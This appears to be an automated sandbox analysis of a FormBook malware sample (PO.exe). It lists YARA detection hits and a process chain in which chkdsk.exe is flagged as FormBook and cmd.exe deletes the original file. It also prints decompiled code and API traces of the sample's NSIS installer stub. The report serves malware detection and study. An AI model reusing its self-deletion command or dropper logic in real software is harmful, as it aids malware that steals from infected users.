                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: explorer.exe PID: 3472 Parent PID: 2904

                                          General

                                          Start time:12:12:33
                                          Start date:08/04/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff693d90000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: chkdsk.exe PID: 1716 Parent PID: 3472

                                          General

                                          Start time:12:12:50
                                          Start date:08/04/2021
                                          Path:C:\Windows\SysWOW64\chkdsk.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                          Imagebase:0x7ff797770000
                                          File size:23040 bytes
                                          MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 4500 Parent PID: 1716

                                          General

                                          Start time:12:12:54
                                          Start date:08/04/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\PO.exe'
                                          Imagebase:0x980000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 1260 Parent PID: 4500

                                          General

                                          Start time:12:12:55
                                          Start date:08/04/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7ecfc0000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: PO.exe PID: 5720 Parent PID: 5624 PO.exeCOMMON

                                            Executed Functions

                                            Function 0040314A, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282stringfilecomCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x7a3030 = _t31;
				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
				E004059BF(0x7a2780, "NSIS Error");
				_t89 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89);
				_t36 = E00403116(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "\"C:\\Users\\alfons\\Desktop\\PO.exe\" ";
					DeleteFileA(_t96); // executed
					E004059BF(_t96, GetCommandLineA());
					 *0x7a2f80 = GetModuleHandleA(0);
					_t41 = _t96;
					if("\"C:\\Users\\alfons\\Desktop\\PO.exe\" " == 0x22) {
						_v404 = 0x22;
						_t41 =  &M007A9001;
					}
					_t43 = CharNextA(E004054F7(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E004054F7(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059BF("C:\\Users\\alfons\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E00403501();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x7a3014;
											if( *0x7a3014 != 0) {
												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x7a302c;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052BF(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x7a2f94 == _t46) {
										L31:
										 *0x7a302c =  *0x7a302c | 0xffffffff;
										_v396 = E00403526();
										goto L32;
									}
									_t103 = E004054F7(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x79d940 = 0x22;
											lstrcatA(0x79d940, _t89);
											lstrcatA(0x79d940, "Au_.exe");
											DeleteFileA(0x79d941);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
												E00405707(0x79d941, 0);
												if("C:\\Users\\alfons\\AppData\\Local\\Temp" == 0) {
													E00405513(0x79e140);
												} else {
													E004059BF(0x79e140, "C:\\Users\\alfons\\AppData\\Local\\Temp");
												}
												lstrcatA(0x79d940, "\" ");
												lstrcatA(0x79d940, _v400);
												lstrcatA(0x79d940, " _?=");
												lstrcatA(0x79d940, 0x79e140);
												E004054CC(0x79d940);
												_t78 = E00405247(0x79d940, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055AC(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059BF("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									E004059BF("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403116(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}































                                            0x00403153
                                            0x00403156
                                            0x0040315a
                                            0x0040315f
                                            0x00403164
                                            0x0040316b
                                            0x00403171
                                            0x00403187
                                            0x00403197
                                            0x0040319c
                                            0x004031a7
                                            0x004031ad
                                            0x004031b2
                                            0x004031b4
                                            0x004031da
                                            0x004031da
                                            0x004031e0
                                            0x004031ee
                                            0x00403202
                                            0x00403207
                                            0x00403209
                                            0x0040320b
                                            0x00403210
                                            0x00403210
                                            0x00403220
                                            0x00403226
                                            0x0040328f
                                            0x0040328f
                                            0x00403291
                                            0x00403293
                                            0x00000000
                                            0x00000000
                                            0x0040322c
                                            0x0040322f
                                            0x00403237
                                            0x00403237
                                            0x0040323a
                                            0x0040323f
                                            0x00403241
                                            0x00403241
                                            0x00403242
                                            0x00403242
                                            0x00403247
                                            0x0040324a
                                            0x0040327f
                                            0x00403284
                                            0x00403289
                                            0x0040328c
                                            0x0040328e
                                            0x0040328e
                                            0x0040328e
                                            0x00000000
                                            0x0040324c
                                            0x0040324c
                                            0x0040324d
                                            0x00403250
                                            0x00403258
                                            0x0040325b
                                            0x0040325d
                                            0x0040325d
                                            0x0040325d
                                            0x0040325b
                                            0x00403260
                                            0x00403266
                                            0x0040326e
                                            0x00403271
                                            0x00403273
                                            0x00403273
                                            0x00403273
                                            0x00403271
                                            0x00403276
                                            0x0040327d
                                            0x00403297
                                            0x0040329b
                                            0x004032a4
                                            0x004032a9
                                            0x004032aa
                                            0x004032af
                                            0x004032b3
                                            0x00403316
                                            0x00403316
                                            0x0040331b
                                            0x00403323
                                            0x0040344e
                                            0x00403455
                                            0x00403471
                                            0x0040347e
                                            0x00403487
                                            0x00403489
                                            0x0040348b
                                            0x0040348d
                                            0x0040348f
                                            0x00403491
                                            0x00403493
                                            0x004034a3
                                            0x004034a5
                                            0x004034a7
                                            0x004034b4
                                            0x004034c3
                                            0x004034cb
                                            0x004034d3
                                            0x004034d3
                                            0x004034a7
                                            0x00403493
                                            0x0040348f
                                            0x004034d8
                                            0x004034de
                                            0x004034e0
                                            0x004034e4
                                            0x004034e4
                                            0x004034e0
                                            0x004034e9
                                            0x004034ee
                                            0x004034f1
                                            0x004034f3
                                            0x004034f3
                                            0x004034fb
                                            0x004034fb
                                            0x0040332f
                                            0x00403336
                                            0x00403336
                                            0x004032bb
                                            0x00403306
                                            0x00403306
                                            0x00403312
                                            0x00000000
                                            0x00403312
                                            0x004032c4
                                            0x004032d1
                                            0x004032c8
                                            0x004032ce
                                            0x00000000
                                            0x00000000
                                            0x004032d0
                                            0x004032d0
                                            0x004032d0
                                            0x004032d5
                                            0x004032d7
                                            0x004032dc
                                            0x00403342
                                            0x0040334a
                                            0x00403350
                                            0x0040335f
                                            0x00403361
                                            0x0040336a
                                            0x00403375
                                            0x0040337f
                                            0x00403387
                                            0x00000000
                                            0x00000000
                                            0x004033b3
                                            0x00000000
                                            0x00000000
                                            0x004033c9
                                            0x004033d2
                                            0x004033de
                                            0x004033ee
                                            0x004033e0
                                            0x004033e6
                                            0x004033e6
                                            0x004033f9
                                            0x00403403
                                            0x0040340e
                                            0x00403415
                                            0x0040341b
                                            0x00403422
                                            0x00403429
                                            0x0040342c
                                            0x00403432
                                            0x00403432
                                            0x00403429
                                            0x00403434
                                            0x00403434
                                            0x0040343a
                                            0x0040343e
                                            0x00000000
                                            0x00403449
                                            0x004032de
                                            0x004032e1
                                            0x004032ec
                                            0x00000000
                                            0x00000000
                                            0x004032f4
                                            0x004032ff
                                            0x00403304
                                            0x00000000
                                            0x00403304
                                            0x00000000
                                            0x0040327d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403231
                                            0x00403231
                                            0x00403231
                                            0x00403232
                                            0x00403232
                                            0x00000000
                                            0x00403231
                                            0x00000000
                                            0x00403295
                                            0x004031bc
                                            0x004031c8
                                            0x004031d4
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • #17.COMCTL32 ref: 00403164
                                            • OleInitialize.OLE32(00000000), ref: 0040316B
                                            • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                              • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                            • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\PO.exe" ), ref: 004031E0
                                            • GetCommandLineA.KERNEL32 ref: 004031E6
                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 004031F5
                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PO.exe" ,00000020), ref: 00403220
                                            • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                            • ExitProcess.KERNEL32 ref: 00403336
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\PO.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\PO.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                            • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                            • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                            • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                            • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                            • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                            • CopyFileA.KERNEL32(0079E140,0079D941,00000000), ref: 004033C1
                                            • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                            • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                            • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                            • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                            • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                            • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                            • ExitProcess.KERNEL32 ref: 004034FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                            • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\PO.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                            • API String ID: 3079827372-3278349945
                                            • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                            • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                            • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                            • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405301, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156filestringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055AC(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x7a3008 =  *0x7a3008 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059BF(0x7a0588, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E00405513(_t74);
					} else {
						lstrcatA(0x7a0588, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x7a0588,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059BF(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D62(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x7a3008 =  *0x7a3008 + 1;
									} else {
										E00404D62(0xfffffff1, _t74);
										E00405707(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405301(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C94(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054CC(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D62(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D62(0xfffffff1, _t74);
							return E00405707(_t74, 0);
						}
						L30:
						 *0x7a3008 =  *0x7a3008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                            0x0040530c
                                            0x00405310
                                            0x00405319
                                            0x0040531c
                                            0x0040531f
                                            0x00405327
                                            0x00405329
                                            0x0040532a
                                            0x00000000
                                            0x0040532a
                                            0x00405339
                                            0x00405339
                                            0x0040533c
                                            0x0040533f
                                            0x00405353
                                            0x0040535a
                                            0x0040535f
                                            0x00405361
                                            0x00405371
                                            0x00405363
                                            0x00405369
                                            0x00405369
                                            0x0040537c
                                            0x00405391
                                            0x00405393
                                            0x00405399
                                            0x0040539c
                                            0x0040539f
                                            0x00405461
                                            0x00405461
                                            0x00405465
                                            0x00405467
                                            0x00405467
                                            0x00405467
                                            0x00405467
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004053a5
                                            0x004053a5
                                            0x004053ae
                                            0x004053b4
                                            0x004053b9
                                            0x004053bc
                                            0x004053be
                                            0x004053c2
                                            0x004053c4
                                            0x004053c4
                                            0x004053c2
                                            0x004053c7
                                            0x004053ca
                                            0x004053dd
                                            0x004053df
                                            0x004053e4
                                            0x004053ea
                                            0x004053ec
                                            0x00405407
                                            0x0040540e
                                            0x00405414
                                            0x00405416
                                            0x0040543b
                                            0x00405418
                                            0x00405418
                                            0x0040541c
                                            0x00405430
                                            0x0040541e
                                            0x00405421
                                            0x00405429
                                            0x00405429
                                            0x0040541c
                                            0x004053ee
                                            0x004053f4
                                            0x004053f6
                                            0x004053fc
                                            0x004053fc
                                            0x004053f6
                                            0x00000000
                                            0x004053ec
                                            0x004053cc
                                            0x004053cf
                                            0x004053d1
                                            0x00000000
                                            0x00000000
                                            0x004053d3
                                            0x004053d5
                                            0x00000000
                                            0x00000000
                                            0x004053d7
                                            0x004053db
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405440
                                            0x0040544a
                                            0x00405450
                                            0x00405450
                                            0x0040545b
                                            0x00000000
                                            0x00405341
                                            0x00405341
                                            0x00405343
                                            0x0040546b
                                            0x0040546e
                                            0x00405471
                                            0x004054c9
                                            0x004054c9
                                            0x004054c9
                                            0x00405473
                                            0x00405476
                                            0x00405481
                                            0x00405486
                                            0x00405488
                                            0x00000000
                                            0x00000000
                                            0x0040548b
                                            0x00405496
                                            0x0040549d
                                            0x004054a3
                                            0x004054a5
                                            0x00000000
                                            0x004054c1
                                            0x004054a7
                                            0x004054ab
                                            0x00000000
                                            0x00000000
                                            0x004054b0
                                            0x00000000
                                            0x004054b7
                                            0x00405478
                                            0x00405478
                                            0x00000000
                                            0x00405478
                                            0x00405349
                                            0x0040534d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040534d

                                            APIs
                                            • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 0040531F
                                            • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 00405369
                                            • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 0040537C
                                            • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 00405382
                                            • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 00405393
                                            • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
                                            • FindClose.KERNEL32(?), ref: 0040545B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
